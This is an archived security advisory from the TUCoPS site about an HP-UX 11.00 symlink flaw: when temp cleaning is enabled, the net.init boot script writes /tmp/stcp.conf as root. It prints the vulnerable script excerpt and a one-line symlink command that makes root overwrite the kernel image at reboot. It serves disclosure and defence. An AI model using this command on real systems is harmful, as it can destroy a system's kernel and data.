Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: HP/UX :: netini.htm

HP-UX temp cleaning vulnerabilities



Vulnerability

    net.init

Affected

    HpUX 11.00

Description

    Following  is  based  on  a  [HackersLab bugpaper].  Default HP-UX
    clean_tmps rc script is disable.  cat /etc/rc.config.d

        ...
        CLEAR_TMP=0
        ...

    But, When clean_tmps rc script enable, Anybody able to risk system

        CLEAR_TMP=1

    - rc script file priorty

        /sbin/rc2.d/S008net.init
        /sbin/rc2.d/S204clean_tmps

    - /sbin/init.d/net.init

        ...omited....
        cat > /tmp/stcp.conf <<EndConf
        tcp -1 0 tcpm
        udp -1 0 udpm
        rawip -1 0 rawipm
        arp -1 0 arpm
        EndConf
        ...omited...

    If  you  make  symbolic  link  to  /tmp/stcp.conf,  It's overwrite
    destination in root permission when reboot.  Eg.

        ln -s /stand/vmunix /tmp/stcp.conf

Solution

    Disable tmp cleaning.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH